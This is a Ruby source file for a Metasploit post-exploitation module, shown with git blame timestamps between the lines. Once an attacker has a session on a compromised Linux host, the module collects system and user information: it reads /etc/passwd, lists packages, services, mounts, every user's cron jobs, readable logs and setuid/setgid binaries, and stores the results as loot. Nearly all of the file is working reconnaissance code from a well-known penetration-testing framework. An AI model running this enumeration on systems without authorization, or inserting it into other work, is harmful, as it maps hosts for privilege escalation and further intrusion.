metasploit-framework/modules/post/linux/gather/enum_system.rb

171 lines
5.2 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Post
2013-09-05 18:41:25 +00:00
include Msf::Post::File
include Msf::Post::Linux::System
def initialize(info = {})
super(update_info(info,
2013-09-05 18:41:25 +00:00
'Name' => 'Linux Gather System and User Information',
'Description' => %q{
This module gathers system information. We collect
installed packages, installed services, mount information,
user list, user bash history and cron jobs
},
'License' => MSF_LICENSE,
'Author' =>
[
'Carlos Perez <carlos_perez[at]darkoperator.com>', # get_packages and get_services
'Stephen Haywood <averagesecurityguy[at]gmail.com>', # get_cron and original enum_linux
'sinn3r', # Testing and modification of original enum_linux
'ohdae <bindshell[at]live.com>', # Combined separate mods, modifications and testing
2014-02-11 01:16:04 +00:00
'Roberto Espreto <robertoespreto[at]gmail.com>', # log files and setuid/setgid
2013-09-05 18:41:25 +00:00
],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter']
2013-09-05 18:41:25 +00:00
))
end
def run
distro = get_sysinfo
store_loot(
"linux.version",
"text/plain",
session,
"Distro: #{distro[:distro]},Version: #{distro[:version]}, Kernel: #{distro[:kernel]}",
"linux_info.txt",
"Linux Version")
# Print the info
print_good("Info:")
print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}")
users = execute("/bin/cat /etc/passwd | cut -d : -f 1")
user = execute("/usr/bin/whoami")
print_good("\tModule running as \"#{user}\" user")
2013-09-05 18:41:25 +00:00
installed_pkg = get_packages(distro[:distro])
installed_svc = get_services(distro[:distro])
mount = execute("/bin/mount -l")
crons = get_crons(users, user)
diskspace = execute("/bin/df -ahT")
disks = (mount + "\n\n" + diskspace)
2014-02-11 12:08:12 +00:00
logfiles = execute("find /var/log -type f -perm -4 2> /dev/null")
uidgid = execute("find / -xdev -type f -perm +6000 -perm -1 2> /dev/null")
2013-09-05 18:41:25 +00:00
save("Linux version", distro)
save("User accounts", users)
save("Installed Packages", installed_pkg)
save("Running Services", installed_svc)
save("Cron jobs", crons)
save("Disk info", disks)
2014-02-11 01:16:04 +00:00
save("Logfiles", logfiles)
save("Setuid/setgid files", uidgid)
2013-09-05 18:41:25 +00:00
end
def save(msg, data, ctype = 'text/plain')
2013-09-05 18:41:25 +00:00
ltype = "linux.enum.system"
loot = store_loot(ltype, ctype, session, data, nil, msg)
print_status("#{msg} stored in #{loot}")
2013-09-05 18:41:25 +00:00
end
def get_host
case session.type
when /meterpreter/
host = sysinfo["Computer"]
when /shell/
host = session.shell_command_token("hostname").chomp
end
print_status("Running module against #{host}")
return host
end
def execute(cmd)
vprint_status("Execute: #{cmd}")
output = cmd_exec(cmd)
return output
end
def cat_file(filename)
vprint_status("Download: #{filename}")
output = read_file(filename)
return output
end
def get_packages(distro)
packages_installed = ""
case distro
when /fedora|redhat|suse|mandrake|oracle|amazon/
2013-09-05 18:41:25 +00:00
packages_installed = execute("rpm -qa")
when /slackware/
packages_installed = execute("/bin/ls /var/log/packages")
when /ubuntu|debian/
packages_installed = execute("/usr/bin/dpkg -l")
when /gentoo/
2013-09-05 18:41:25 +00:00
packages_installed = execute("equery list")
when /arch/
2013-09-05 18:41:25 +00:00
packages_installed = execute("/usr/bin/pacman -Q")
else
print_error("Could not determine package manager to get list of installed packages")
end
return packages_installed
end
def get_services(distro)
services_installed = ""
case distro
when /fedora|redhat|suse|mandrake|oracle|amazon/
2013-09-05 18:41:25 +00:00
services_installed = execute("/sbin/chkconfig --list")
when /slackware/
2013-09-05 18:41:25 +00:00
services_installed << "\nEnabled:\n*************************\n"
services_installed << execute("ls -F /etc/rc.d | /bin/grep \'*$\'")
services_installed << "\n\nDisabled:\n*************************\n"
services_installed << execute("ls -F /etc/rc.d | /bin/grep \'[a-z0-9A-z]$\'")
when /ubuntu|debian/
services_installed = execute("/usr/sbin/service --status-all")
when /gentoo/
2013-09-05 18:41:25 +00:00
services_installed = execute("/bin/rc-status --all")
when /arch/
2015-04-14 23:19:38 +00:00
services_installed = execute("/bin/egrep '^DAEMONS' /etc/rc.conf")
2013-09-05 18:41:25 +00:00
else
2015-04-14 23:19:38 +00:00
print_error("Could not determine the Linux Distribution to get list of configured services")
2013-09-05 18:41:25 +00:00
end
return services_installed
end
def get_crons(users, user)
if user == "root" && !users.nil?
users = users.chomp.split
2013-09-05 18:41:25 +00:00
users.each do |u|
if u == "root"
vprint_status("Enumerating as root")
cron_data = ""
users.each do |usr|
cron_data += "*****Listing cron jobs for #{usr}*****\n"
cron_data += execute("crontab -u #{usr} -l") + "\n\n"
2013-09-05 18:41:25 +00:00
end
end
end
else
2015-04-14 23:19:38 +00:00
vprint_status("Enumerating as #{user}")
2013-09-05 18:41:25 +00:00
cron_data = "***** Listing cron jobs for #{user} *****\n\n"
cron_data += execute("crontab -l")
# Save cron data to loot
return cron_data
end
2013-09-05 18:41:25 +00:00
end
end